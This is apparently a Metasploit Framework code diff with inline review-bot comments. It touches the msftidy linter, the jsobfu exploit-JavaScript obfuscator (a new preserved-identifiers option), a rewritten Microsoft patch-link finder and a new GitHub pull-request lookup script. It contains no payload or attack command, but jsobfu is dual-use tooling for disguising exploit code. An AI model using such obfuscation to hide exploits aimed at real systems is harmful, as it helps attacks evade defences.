@@ -670,71 +739,37 @@ class Msftidy end end -# -# Run all the msftidy checks. -# -# @param full_filepath [String] The full file path to check -# @return status [Integer] A status code suitable for use as an exit status -def run_checks(full_filepath) - tidy = Msftidy.new(full_filepath) - tidy.check_mode - tidy.check_shebang - tidy.check_nokogiri - tidy.check_rubygems - tidy.check_ref_identifiers - tidy.check_old_keywords - tidy.check_verbose_option - tidy.check_badchars - tidy.check_extname - tidy.check_old_rubies - tidy.check_ranking - tidy.check_disclosure_date - tidy.check_title_casing - tidy.check_bad_terms - tidy.check_function_basics - tidy.check_lines - tidy.check_snake_case_filename - tidy.check_comment_splat - tidy.check_vuln_codes - tidy.check_vars_get - tidy.check_newline_eof - tidy.check_sock_get - tidy.check_udp_sock_get - tidy.check_invalid_url_scheme - tidy.check_print_debug - tidy.check_register_datastore_debug - tidy.check_use_datastore_debug - return tidy -end - ## # # Main program # ## -dirs = ARGV +if __FILE__ == $PROGRAM_NAME + dirs = ARGV -@exit_status = 0 + @exit_status = 0 -if dirs.length < 1 - $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>" - @exit_status = 1 - exit(@exit_status) -end - -dirs.each do |dir| - begin - Find.find(dir) do |full_filepath| - next if full_filepath =~ /\.git[\x5c\x2f]/ - next unless File.file? full_filepath - next unless full_filepath =~ /\.rb$/ - msftidy = run_checks(full_filepath) - @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i) - end - rescue Errno::ENOENT - $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory" + if dirs.length < 1 + $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>" + @exit_status = 1 + exit(@exit_status) end -end -exit(@exit_status.to_i) + dirs.each do |dir| + begin + Find.find(dir) do |full_filepath| + next if full_filepath =~ /\.git[\x5c\x2f]/ + next unless File.file? 
full_filepath + next unless full_filepath =~ /\.rb$/ + msftidy = Msftidy.new(full_filepath) + msftidy.run_checks + @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i) + end + rescue Errno::ENOENT + $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory" + end + end + + exit(@exit_status.to_i) +end diff --git a/tools/exploit/jsobfu.rb b/tools/exploit/jsobfu.rb index e491dbc54e..d3417c1612 100755 --- a/tools/exploit/jsobfu.rb +++ b/tools/exploit/jsobfu.rb @@ -32,6 +32,10 @@ module Jsobfu options[:output] = v end + opt.on('-p', '--preserved-identifiers id1,id2', 'The identifiers to preserve') do |v| + options[:preserved_identifiers] = v.split(',') + end + opt.on_tail('-h', '--help', 'Show this message') do $stdout.puts opt exit @@ -67,7 +71,10 @@ module Jsobfu def run original_js = read_js(@opts[:input]) js = ::Rex::Exploitation::JSObfu.new(original_js) - js.obfuscate(:iterations=>@opts[:iteration].to_i) + obfu_opts = {} + obfu_opts.merge!(iterations: @opts[:iteration].to_i) + obfu_opts.merge!(preserved_identifiers: @opts[:preserved_identifiers] || []) + js.obfuscate(obfu_opts) js = js.to_s output_stream = $stdout diff --git a/tools/exploit/msu_finder.rb b/tools/exploit/msu_finder.rb index b6d510e1dc..5203a5b167 100755 --- a/tools/exploit/msu_finder.rb +++ b/tools/exploit/msu_finder.rb 
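Review bot: The `-p` handler in jsobfu.rb stores `v.split(',')` unchanged, so an argument such as `foo, bar` keeps the leading space in `" bar"` and a leading comma yields an empty string. Neither is likely to match an identifier in the script, so the name would presumably be obfuscated anyway without any message. Normalising at parse time avoids that: `options[:preserved_identifiers] = v.split(',').map(&:strip).reject(&:empty?)`. In `run`, the two `merge!` calls on a fresh hash can be a single call, `js.obfuscate(iterations: @opts[:iteration].to_i, preserved_identifiers: @opts[:preserved_identifiers] || [])`.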
@@ -1,771 +1,108 @@ #!/usr/bin/env ruby -### -# -# This sceript will enumerate download links for Microsoft patches. -# -# Author: -# * sinn3r -# -### - - -msfbase = __FILE__ -while File.symlink?(msfbase) - msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) -end -$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib'))) -require 'rex' -require 'nokogiri' -require 'uri' -require 'json' +require 'patch_finder/core/helper' +require 'patch_finder/msu' require 'optparse' -module MicrosoftPatchFinder +class PatchFinderBin - module SiteInfo - TECHNET = { - ip: '157.56.148.23', - vhost: 'technet.microsoft.com' - } + include PatchFinder::Helper - MICROSOFT = { - ip: '104.72.230.162', - vhost: 'www.microsoft.com' - } + attr_reader :args - GOOGLEAPIS = { - ip: '74.125.28.95', - vhost: 'www.googleapis.com' - } - end + def get_parsed_options + options = {} - # This provides whatever other classes need. - module Helper + parser = OptionParser.new do |opt| + opt.separator '' + opt.separator 'Specific options:' - # Prints a debug message. - # - # @param msg [String] The message to print. - # @return [void] - def print_debug(msg='') - $stderr.puts "[DEBUG] #{msg}" - end + opt.on('-q', '--query <keyword>', 'Find advisories including this keyword') do |v| + options[:keyword] = v + end - # Prints a status message. - # - # @param msg [String] The message to print. - # @return [void] - def print_status(msg='') - $stderr.puts "[*] #{msg}" - end - - # Prints an error message. - # - # @param msg [String] The message to print. - # @return [void] - def print_error(msg='') - $stderr.puts "[ERROR] #{msg}" - end - - # Prints a regular message. - # - # @param msg [String] The message to print. - # @return pvoid - def print_line(msg='') - $stdout.puts msg - end - - # Sends an HTTP request with Rex. - # - # @param rhost [Hash] Information about the target host. Use MicrosoftPatchFinder::SiteInfo. 
- # @option rhost [String] :vhost - # @option rhost [String] :ip IPv4 address - # @param opts [Hash] Information about the Rex request. - # @raise [RuntimeError] Failure to make a request. - # @return [Rex::Proto::Http::Response] - def send_http_request(rhost, opts={}) - res = nil - - opts.merge!({'vhost'=>rhost[:vhost]}) - - print_debug("Requesting: #{opts['uri']}") - - cli = Rex::Proto::Http::Client.new(rhost[:ip], 443, {}, true, 'TLS1') - tries = 1 - begin - cli.connect - req = cli.request_cgi(opts) - res = cli.send_recv(req) - rescue ::EOFError, Errno::ETIMEDOUT ,Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e - if tries < 3 - print_error("Failed to make a request, but will try again in 5 seconds...") - sleep(5) - tries += 1 - retry + opt.on('-s', '--search-engine <engine>', '(Optional) The type of search engine to use (Technet or Google). Default: Technet') do |v| + case v.to_s + when /^google$/i + options[:search_engine] = :google + when /^technet$/i + options[:search_engine] = :technet else - raise "[x] Unable to make a request: #{e.class} #{e.message}\n#{e.backtrace * "\n"}" - end - ensure - cli.close - end - - res - end - end - - - # Collects MSU download links from Technet. - class PatchLinkCollector - include MicrosoftPatchFinder::Helper - - # Returns a response of an advisory page. - # - # @param msb [String] MSB number in this format: msxx-xxx - # @return [Rex::Proto::Http::Response] - def download_advisory(msb) - send_http_request(SiteInfo::TECHNET, { - 'uri' => "/en-us/library/security/#{msb}.aspx" - }) - end - - - # Returns the most appropriate pattern that could be used to parse and extract links from an advisory. - # - # @param n [Nokogiri::HTML::Document] The advisory page parsed by Nokogiri - # @return [Hash] - def get_appropriate_pattern(n) - # These pattern checks need to be in this order. 
- patterns = [ - # This works from MS14-001 until the most recent - { - check: '//div[@id="mainBody"]//div//h2//div//span[contains(text(), "Affected Software")]', - pattern: '//div[@id="mainBody"]//div//div[@class="sectionblock"]//table//a' - }, - # This works from ms03-040 until MS07-029 - { - check: '//div[@id="mainBody"]//ul//li//a[contains(text(), "Download the update")]', - pattern: '//div[@id="mainBody"]//ul//li//a[contains(text(), "Download the update")]' - }, - # This works from sometime until ms03-039 - { - check: '//div[@id="mainBody"]//div//div[@class="sectionblock"]//p//strong[contains(text(), "Download locations")]', - pattern: '//div[@id="mainBody"]//div//div[@class="sectionblock"]//ul//li//a' - }, - # This works from MS07-030 until MS13-106 (the last update in 2013) - # The check is pretty short so if it kicks in too early, it tends to create false positives. - # So it goes last. - { - check: '//div[@id="mainBody"]//p//strong[contains(text(), "Affected Software")]', - pattern: '//div[@id="mainBody"]//table//a' - }, - ] - - patterns.each do |pattern| - if n.at_xpath(pattern[:check]) - return pattern[:pattern] + fail OptionParser::InvalidOption, "Invalid search engine: #{v}" end end - nil - end - - - # Returns the details page for an advisory. - # - # @param res [Rex::Proto::Http::Response] - # @return [Array<URI::HTTP>] An array of URI objects. 
- def get_details_aspx(res) - links = [] - - page = res.body - n = ::Nokogiri::HTML(page) - - appropriate_pattern = get_appropriate_pattern(n) - - n.search(appropriate_pattern).each do |anchor| - found_link = anchor.attributes['href'].value - if /https:\/\/www\.microsoft\.com\/downloads\/details\.aspx\?familyid=/i === found_link - begin - links << URI(found_link) - rescue ::URI::InvalidURIError - print_error "Unable to parse URI: #{found_link}" - end - end + opt.on('-r', '--regex <string>', '(Optional) Specify what type of links you want') do |v| + options[:regex] = v end - links - end - - - # Returns the redirected page. - # - # @param rhost [Hash] From MicrosoftPatchFinder::SiteInfo - # @param res [Rex::Proto::Http::Response] - # @return [Rex::Proto::Http::Response] - def follow_redirect(rhost, res) - opts = { - 'method' => 'GET', - 'uri' => res.headers['Location'] - } - - send_http_request(rhost, opts) - end - - - # Returns the download page of an advisory. - # - # @param uri [URI::HTTP] - # @return [Rex::Proto::Http::Response] - def get_download_page(uri) - opts = { - 'method' => 'GET', - 'uri' => uri.request_uri - } - - res = send_http_request(SiteInfo::MICROSOFT, opts) - - if res.headers['Location'] - return follow_redirect(SiteInfo::MICROSOFT, res) + opt.on('--apikey <key>', '(Optional) Google API key.') do |v| + options[:google_api_key] = v end - res - end - - - # Returns a collection of found MSU download links from an advisory. - # - # @param page [String] The HTML page of the advisory. 
- # @return [Array<String>] An array of links - def get_download_links(page) - page = ::Nokogiri::HTML(page) - - relative_uri = page.search('a').select { |a| - a.attributes['href'] && a.attributes['href'].value.include?('confirmation.aspx?id=') - }.first - - return [] unless relative_uri - relative_uri = relative_uri.attributes['href'].value - - absolute_uri = URI("https://www.microsoft.com/en-us/download/#{relative_uri}") - opts = { - 'method' => 'GET', - 'uri' => absolute_uri.request_uri - } - res = send_http_request(SiteInfo::MICROSOFT, opts) - n = ::Nokogiri::HTML(res.body) - - n.search('a').select { |a| - a.attributes['href'] && a.attributes['href'].value.include?('http://download.microsoft.com/download/') - }.map! { |a| a.attributes['href'].value }.uniq - end - - - # Returns whether the page is an advisory or not. - # - # @param res [Rex::Proto::Http::Response] - # @return [Boolean] true if the page is an advisory, otherwise false. - def has_advisory?(res) - !res.body.include?('We are sorry. The page you requested cannot be found') - end - - - # Returns whether the number is in valid MSB format or not. - # - # @param msb [String] The number to check. - # @return [Boolean] true if the number is in MSB format, otherwise false. - def is_valid_msb?(msb) - /^ms\d\d\-\d\d\d$/i === msb - end - end - - - # A class that searches advisories from Technet. - class TechnetMsbSearch - include MicrosoftPatchFinder::Helper - - def initialize - opts = { - 'method' => 'GET', - 'uri' => '/en-us/security/bulletin/dn602597.aspx' - } - res = send_http_request(SiteInfo::TECHNET, opts) - @firstpage ||= res.body - end - - - # Returns a collection of found MSB numbers either from the product list, or generic search. - # - # @param keyword [String] The product to look for. - # @return [Array<String>] - def find_msb_numbers(keyword) - product_list_matches = get_product_dropdown_list.select { |p| Regexp.new(keyword) === p[:option_text] } - if product_list_matches.empty? 
- print_debug("Did not find a match from the product list, attempting a generic search") - search_by_keyword(keyword) - else - product_names = [] - ids = [] - product_list_matches.each do |e| - ids << e[:option_value] - product_names << e[:option_text] - end - print_debug("Matches from the product list (#{product_names.length}): #{ product_names * ', ' }") - search_by_product_ids(ids) - end - end - - - # Returns the search results in JSON format. - # - # @param keyword [String] The keyword to search. - # @return [Hash] JSON data. - def search(keyword) - opts = { - 'method' => 'GET', - 'uri' => '/security/bulletin/services/GetBulletins', - 'vars_get' => { - 'searchText' => keyword, - 'sortField' => '0', - 'sortOrder' => '1', - 'currentPage' => '1', - 'bulletinsPerPage' => '9999', - 'locale' => 'en-us' - } - } - res = send_http_request(SiteInfo::TECHNET, opts) - begin - return JSON.parse(res.body) - rescue JSON::ParserError + opt.on('--cx <id>', '(Optional) Google search engine ID.') do |v| + options[:google_search_engine_id] = v end - {} - end + opt.on('-d', '--dir <string>', '(Optional) The directory to save the patches') do |v| + unless File.directory?(v) + fail OptionParser::InvalidOption, "Directory not found: #{v}" + end - - # Performs a search based on product IDs - # - # @param ids [Array<Fixnum>] An array of product IDs. - # @return [Array<String>] An array of found MSB numbers. - def search_by_product_ids(ids) - msb_numbers = [] - - ids.each do |id| - j = search(id) - msb = j['b'].collect { |e| e['Id']}.map{ |e| e.downcase} - msb_numbers.concat(msb) + options[:destdir] = v end - msb_numbers - end - - - # Performs a search based on a keyword - # - # @param keyword [String] - # @return [Array<String>] An array of found MSB numbers - def search_by_keyword(keyword) - j = search(keyword) - j['b'].collect { |e| e['Id']}.map{ |e| e.downcase } - end - - - # Returns the product list that Technet currently supports for searching. 
- # - # @return [Array<Hash>] - def get_product_dropdown_list - @product_dropdown_list ||= lambda { - list = [] - - page = ::Nokogiri::HTML(firstpage) - page.search('//div[@class="sb-search"]//select[@id="productDropdown"]//option').each do |product| - option_value = product.attributes['value'].value - option_text = product.text - next if option_value == '-1' # This is the ALL option - list << { option_value: option_value, option_text: option_text } - end - - list - }.call - end - - attr_reader :firstpage - end - - class GoogleMsbSearch - include MicrosoftPatchFinder::Helper - - # API Doc: - # https://developers.google.com/custom-search/json-api/v1/using_rest - # Known bug: - # * Always gets 20 MSB results. Weird. - - def initialize(opts={}) - @api_key = opts[:api_key] - @search_engine_id = opts[:search_engine_id] - end - - - # Returns the MSB numbers associated with the keyword. - # - # @param keyword [String] The keyword to search for in an advisory. - # @return [Array<String>] MSB numbers - def find_msb_numbers(keyword) - msb_numbers = [] - next_starting_index = 1 - - begin - while - results = search(keyword: keyword, starting_index: next_starting_index) - items = results['items'] - items.each do |item| - title = item['title'] - msb = title.scan(/Microsoft Security Bulletin (MS\d\d\-\d\d\d)/).flatten.first - if msb - msb_numbers << msb.downcase - end - end - - next_starting_index = get_next_index(results) - next_page = results['queries']['nextPage'] - - # Google API Documentation: - # https://developers.google.com/custom-search/json-api/v1/using_rest - # "This role is not present if the current results are the last page. - # Note: This API returns up to the first 100 results only." - break if next_page.nil? 
|| next_starting_index > 100 - end - rescue RuntimeError => e - print_error(e.message) - return msb_numbers.uniq - end - - msb_numbers.uniq - end - - - # Performs a search using Google API - # - # @param opts [Hash] - # @options opts [String] :keyword The keyword to search - # @return [Hash] JSON data - def search(opts={}) - starting_index = opts[:starting_index] - - search_string = [ - opts[:keyword], - 'intitle:"Microsoft Security Bulletin"', - '-"Microsoft Security Bulletin Summary"' - ].join(' ') - - opts = { - 'method' => 'GET', - 'uri' => '/customsearch/v1', - 'vars_get' => { - 'key' => api_key, - 'cx' => search_engine_id, - 'q' => search_string, - 'start' => starting_index.to_s, - 'num' => '10', # 10 is max - 'c2coff' => '1' # 1 = Disabled, 0 = Enabled - } - } - - res = send_http_request(SiteInfo::GOOGLEAPIS, opts) - results = parse_results(res) - if starting_index == 1 - print_debug("Number of search results: #{get_total_results(results)}") - end - - results - end - - - # Parse Google API search results - # - # @param res [Rex::Proto::Http::Response] - # @raise [RuntimeError] If Google returns an error - # @return [Hash] - def parse_results(res) - j = JSON.parse(res.body) - - if j['error'] - message = j['error']['errors'].first['message'] - reason = j['error']['errors'].first['reason'] - raise "Google Search failed. #{message} (#{reason})" - end - - j - end - - - # Returns the total results. - # - # @param j [Hash] JSON data from Google. - # @return [Fixnum] - def get_total_results(j) - j['queries']['request'].first['totalResults'].to_i - end - - - # Returns the next index. - # - # @param j [Hash] JSON data from Google. - # @return [Fixnum] - def get_next_index(j) - j['queries']['nextPage'] ? 
j['queries']['nextPage'].first['startIndex'] : 0 - end - - # @!attribute api_key - # @return [String] The Google API key - attr_reader :api_key - - # @!attribute search_engine_id - # @return [String] The Google Custom Search Engine ID - attr_reader :search_engine_id - end - - class OptsConsole - def self.banner - %Q| - Usage: #{__FILE__} [options] - - The following example will download all IE update links: - #{__FILE__} -q "Internet Explorer" - - Searching advisories via Technet: - When you submit a query, the Technet search engine will first look it up from a product list, - and then return all the advisories that include the keyword you are looking for. If there's - no match from the product list, then the script will try a generic search. The generic method - also means you can search by MSB, KB, or even the CVE number. - - Searching advisories via Google: - Searching via Google requires an API key and an Search Engine ID from Google. To obtain these, - make sure you have a Google account (such as Gmail), and then do the following: - 1. Go to Google Developer's Console - 1. Enable Custom Search API - 2. Create a browser type credential. The credential is the API key. - 2. Go to Custom Search - 1. Create a new search engine - 2. Under Sites to Search, set: technet.microsoft.com - 3. In your search site, get the Search Engine ID under the Basics tab. - By default, Google has a quota limit of 1000 queries per day. You can raise this limit with - a fee. - - The way this tool uses Google to find advisories is the same as doing the following manually: - [Query] site:technet.microsoft.com intitle:"Microsoft Security Bulletin" -"Microsoft Security Bulletin Summary" - - Dryrun: - If you'd like to double check on false positives, you can use the -d flag and manually verify - the accuracy of the search results before actually collecting the download links. 
- - Download: - The following trick demonstrates how you can automatically download the updates: - ruby #{__FILE__} -q "ms15-100" -r x86 > /tmp/list.txt && wget -i /tmp/list.txt - - Patch Extraction: - After downloading the patch, you can use the extract_msu.bat tool to automatically extract - Microsoft patches. - | - end - - def self.get_parsed_options - options = {} - - parser = OptionParser.new do |opt| - opt.banner = banner.strip.gsub(/^[[:blank:]]{4}/, '') - opt.separator '' - opt.separator 'Specific options:' - - opt.on('-q', '--query <keyword>', 'Find advisories that include this keyword') do |v| - options[:keyword] = v - end - - opt.on('-s', '--search-engine <engine>', '(Optional) The type of search engine to use (Technet or Google). Default: Technet') do |v| - case v.to_s - when /^google$/i - options[:search_engine] = :google - when /^technet$/i - options[:search_engine] = :technet - else - raise OptionParser::MissingArgument, "Invalid search engine: #{v}" - end - end - - opt.on('-r', '--regex <string>', '(Optional) Specify what type of links you want') do |v| - options[:regex] = v - end - - opt.on('--apikey <key>', '(Optional) Google API key. Set this if the search engine is Google') do |v| - options[:google_api_key] = v - end - - opt.on('--cx <id>', '(Optional) Google search engine ID. Set this if the search engine is Google') do |v| - options[:google_search_engine_id] = v - end - - opt.on('-d', '--dryrun', '(Optional) Perform a search, but do not fetch download links. Default: no') do |v| - options[:dryrun] = true - end - - opt.on_tail('-h', '--help', 'Show this message') do - $stderr.puts opt - exit - end - end - - parser.parse! - - if options.empty? - raise OptionParser::MissingArgument, 'No options set, try -h for usage' - elsif options[:keyword].nil? || options[:keyword].empty? 
- raise OptionParser::MissingArgument, '-q is required' - end - - unless options[:search_engine] - options[:search_engine] = :technet - end - - if options[:search_engine] == :google - if options[:google_api_key].nil? || options[:google_search_engine_id].empty? - raise OptionParser::MissingArgument, 'Search engine is Google, but no API key specified' - elsif options[:google_search_engine_id].nil? || options[:google_search_engine_id].empty? - raise OptionParser::MissingArgument, 'Search engine is Google, but no search engine ID specified' - end - end - - options - end - end - - class Driver - include MicrosoftPatchFinder::Helper - - def initialize - begin - @args = MicrosoftPatchFinder::OptsConsole.get_parsed_options - rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e - print_error(e.message) + opt.on_tail('-h', '--help', 'Show this message') do + $stderr.puts opt exit end end - # Returns download links. - # - # @param msb [String] MSB number. - # @param regex [String] The regex pattern to use to collect specific download URLs. - # @return [Array<String>] Download links - def get_download_links(msb, regex=nil) - msft = MicrosoftPatchFinder::PatchLinkCollector.new + parser.parse! - unless msft.is_valid_msb?(msb) - print_error "Not a valid MSB format." - print_error "Example of a correct one: ms15-100" - return [] - end - - res = msft.download_advisory(msb) - - if !msft.has_advisory?(res) - print_error "The advisory cannot be found" - return [] - end - - links = msft.get_details_aspx(res) - if links.length == 0 - print_error "Unable to find download.microsoft.com links. Please manually navigate to the page." 
- return [] - else - print_debug("Found #{links.length} affected products for this advisory.") - end - - link_collector = [] - - links.each do |link| - download_page = msft.get_download_page(link) - download_links = msft.get_download_links(download_page.body) - if regex - filtered_links = download_links.select { |l| Regexp.new(regex) === l } - link_collector.concat(filtered_links) - else - link_collector.concat(download_links) - end - end - - link_collector + if options.empty? + fail OptionParser::MissingArgument, 'No options set, try -h for usage' + elsif options[:keyword].nil? || options[:keyword].empty? + fail OptionParser::MissingArgument, '-q is required' end - # Performs a search via Google - # - # @param keyword [String] The keyword to search - # @param api_key [String] Google API key - # @param cx [String] Google Search Engine Key - # @return [Array<String>] See MicrosoftPatchFinder::GoogleMsbSearch#find_msb_numbers - def google_search(keyword, api_key, cx) - search = MicrosoftPatchFinder::GoogleMsbSearch.new(api_key: api_key, search_engine_id: cx) - search.find_msb_numbers(keyword) + unless options[:search_engine] + options[:search_engine] = :technet end - - # Performs a search via Technet - # - # @param keyword [String] The keyword to search - # @return [Array<String>] See MicrosoftPatchFinder::TechnetMsbSearch#find_msb_numbers - def technet_search(keyword) - search = MicrosoftPatchFinder::TechnetMsbSearch.new - search.find_msb_numbers(keyword) - end - - def run - links = [] - msb_numbers = [] - keyword = args[:keyword] - regex = args[:regex] ? 
args[:regex] : nil - api_key = args[:google_api_key] - cx = args[:google_search_engine_id] - - case args[:search_engine] - when :technet - print_debug("Searching advisories that include #{keyword} via Technet") - msb_numbers = technet_search(keyword) - when :google - print_debug("Searching advisories that include #{keyword} via Google") - msb_numbers = google_search(keyword, api_key, cx) - end - - print_debug("Advisories found (#{msb_numbers.length}): #{msb_numbers * ', '}") unless msb_numbers.empty? - - return if args[:dryrun] - - msb_numbers.each do |msb| - print_debug("Finding download links for #{msb}") - links.concat(get_download_links(msb, regex)) - end - - unless links.empty? - print_status "Found these links:" - print_line links * "\n" - print_status "Total downloadable updates found: #{links.length}" + if options[:search_engine] == :google + if options[:google_api_key].nil? || options[:google_search_engine_id].empty? + fail OptionParser::MissingArgument, 'No API key set for Google' + elsif options[:google_search_engine_id].nil? || options[:google_search_engine_id].empty? 
+ fail OptionParser::MissingArgument, 'No search engine ID set for Google' end end - attr_reader :args + options + end + + def initialize + @args = get_parsed_options + rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e + print_error(e.message) + exit + end + + def main + cli = PatchFinder::MSU.new(verbose: true) + links = cli.find_msu_download_links(args) + if args[:destdir] + print_status("Download links found: #{links.length}") + print_status('Downloading files, please wait...') + download_files(links, args[:destdir]) + else + print_status('Download links found:') + print_line(links * "\n") + end end end - if __FILE__ == $PROGRAM_NAME - mod = MicrosoftPatchFinder::Driver.new - begin - mod.run - rescue Interrupt - $stdout.puts - $stdout.puts "Good bye" - end + bin = PatchFinderBin.new + bin.main end - -=begin -TODO: - * Make a gem - * Make it generic in order to manage different kind of patches and providers - * Multithreading -=end \ No newline at end of file diff --git a/tools/modules/file_pull_requests.rb b/tools/modules/file_pull_requests.rb new file mode 100755 index 0000000000..547561ff18 --- /dev/null +++ b/tools/modules/file_pull_requests.rb 
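Review bot: In `get_parsed_options` of tools/exploit/msu_finder.rb, the Google branch tests `options[:google_api_key].nil? || options[:google_search_engine_id].empty?`, which checks the wrong key in the second half. With `--apikey` given and `--cx` omitted this calls `nil.empty?` and raises NoMethodError, which the `rescue` in `initialize` does not cover, and an empty API key is never rejected. The condition should be `if options[:google_api_key].nil? || options[:google_api_key].empty?`. In `initialize`, the rescue ends with a bare `exit`, so an option error still returns status 0; `exit(1)` would let callers detect the failure. The new `-d` path passes scraped links straight to `download_files`, whose transport and integrity handling live in the patch_finder gem outside this diff, so that is worth confirming separately.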
@@ -0,0 +1,251 @@ +#!/usr/bin/env ruby + +### +# +# This tool allows you to find all the pull requests for a particular file in the Metasploit +# repository. It does not include commit history from SVN. +# +# Author: sinn3r +# +### + +require 'net/http' +require 'optparse' + +begin + require 'octokit' + require 'nokogiri' +rescue LoadError => e + gem = e.message.split.last + abort "#{gem} not installed: please run `gem install #{gem}'" +end + +module FilePullRequestCollector + + class Exception < RuntimeError; end + + class PullRequestFinder + + attr_accessor :git_client + attr_accessor :repository + attr_accessor :branch + attr_accessor :owner + attr_accessor :git_access_token + + # Initializes parameters. + # + # @param api_key [String] Personal access token from Github. + # @return [void] + def initialize(api_key) + self.owner = 'rapid7' + self.repository = "#{owner}/metasploit-framework" + self.branch = 'master' + self.git_access_token = api_key + self.git_client = Octokit::Client.new(access_token: git_access_token) + end + + # Returns the commit history of a file. + # + # @param path [String] A file path in the Metasploit repository. + # @return [Array<Sawyer::Resource>] An array of commits. + # @raise [FilePullRequestCollector::Exception] No commits found. Probably the file path is wrong. + def get_commits_from_file(path) + commits = git_client.commits(repository, branch, path: path) + if commits.empty? + # Possibly the path is wrong. + raise FilePullRequestCollector::Exception, 'No commits found.' + end + + commits + end + + # Returns the author of a commit. + # + # @param commit [Sawyer::Resource] Commit. + # @return [String] + def get_author(commit) + if commit.author + return commit.author[:login].to_s + end + + '' + end + + # Checks if a author should be ignored or not. + # + # @param commit [Sawyer::Resource] Commit. + # @return [TrueClass] Author should be ignored + # @return [FalseClass] Author should not be ignored. 
+ def is_author_blacklisted?(commit) + ['tabassassin'].include?(get_author(commit)) + end + + # Returns all found pull requests. + # + # @param commits [Array<Sawyer::Resource>] Commits + # @return [Hash] + def get_pull_requests_from_commits(commits) + pull_requests = {} + + commits.each do |commit| + next if is_author_blacklisted?(commit) + + pr = get_pull_request_from_commit(commit) + unless pr.empty? + pull_requests[pr[:number]] = pr + end + end + + pull_requests + end + + # Returns the found pull request for a commit. + # + # @param commit [Sawyer::Resource] Commit + # @return [Hash] + def get_pull_request_from_commit(commit) + sha = commit.sha + url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + n = Nokogiri::HTML(res.body) + found_pr_link = n.at('li[@class="pull-request"]//a') + + # If there is no PR associated with this commit, it's probably from the SVN days. + return {} unless found_pr_link + + href = found_pr_link.attributes['href'].text + title = found_pr_link.attributes['title'].text + + # Filter out all the pull requests that do not belong to rapid7. + # If this happens, it's probably because the PR was submitted to somebody's fork. + return {} unless /^\/#{owner}\// === href + + { number: href.scan(/\d+$/).flatten.first, title: title } + end + end + + class Client + + attr_accessor :finder + + # Initializes parameters. + # + # @param api_key [String] + # @return [void] + def initialize(api_key) + self.finder = PullRequestFinder.new(api_key) + end + + # Prints all the found PRs for a file. + # + # @param file_name [String] The file to look up. 
+ # @return [void] + def search(file_name) + commits = finder.get_commits_from_file(file_name) + pull_requests = finder.get_pull_requests_from_commits(commits) + puts "Pull request(s) associated with #{file_name}" + pull_requests.each_pair do |number, pr| + puts "##{number} - #{pr[:title]}" + end + end + end + + class OptsParser + + def self.banner + %Q| + This tool collects all the pull requests submitted to rapid7/metasploit-framework for a + particular file. It does not include history from SVN (what Metasploit used to use + before Git). + + Usage: #{__FILE__} [options] + + Usage Example: + #{__FILE__} -k KEY -f modules/exploits/windows/browser/ms13_069_caret.rb + or + export GITHUB_OAUTH_TOKEN=KEY + #{__FILE__} -f modules/exploits/windows/browser/ms13_069_caret.rb + + How to obtain an API key (access token): + 1. Go to github.com. + 2. Go to Settings under your profile. + 3. Click on Personal Access Tokens + 4. Click on Generate new token + 5. Follow the steps on the screen to complete the process. + + | + end + + def self.parse(args) + options = {} + + opts = OptionParser.new do |opts| + opts.banner = banner.strip.gsub(/^[[:blank:]]{4}/, '') + + opts.separator "" + opts.separator "Specific options:" + + opts.on("-k", "-k <key>", "Github Access Token") do |v| + options[:api_key] = v + end + + opts.on("-f", "--file <name>", "File name") do |v| + options[:file] = v + end + + opts.separator "" + opts.separator "Common options:" + + opts.on_tail("-h", "--help", "Show this message") do + puts opts + exit + end + end + + begin + opts.parse!(args) + rescue OptionParser::InvalidOption + abort "Invalid option, try -h for usage" + end + + if options.empty? 
+ abort "No options specified, try -h for usage" + end + + options + end + end + +end + +if __FILE__ == $PROGRAM_NAME + begin + opts = FilePullRequestCollector::OptsParser.parse(ARGV) + rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e + abort "#{e.message} (please see -h)" + end + + if !opts.has_key?(:api_key) + if !ENV.has_key?('GITHUB_OAUTH_TOKEN') + abort <<EOF +A Github Access Token must be specified to use this tool +Please set GITHUB_OAUTH_TOKEN or specify the -k option +EOF + else + opts[:api_key] = ENV['GITHUB_OAUTH_TOKEN'] + end + end + + begin + cli = FilePullRequestCollector::Client.new(opts[:api_key]) + cli.search(opts[:file]) + rescue FilePullRequestCollector::Exception => e + abort e.message + rescue Interrupt + $stdout.puts + $stdout.puts "Good bye" + end +end
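Review bot: `OptsParser.parse` in tools/modules/file_pull_requests.rb only rejects an empty option set, so a run with `-k KEY` and no `-f` reaches `cli.search(opts[:file])` with a nil path. That presumably asks the API for the commit history of the whole branch rather than one file. Add an explicit check after parsing, such as `abort "-f is required, try -h for usage" unless options[:file]`. A token passed with `-k` ends up in shell history and the process list, so the banner could present the `GITHUB_OAUTH_TOKEN` form as the preferred one. `class Exception < RuntimeError` also shadows Ruby's own `Exception` inside the module, and a name like `Error` would avoid surprises in later `rescue` clauses.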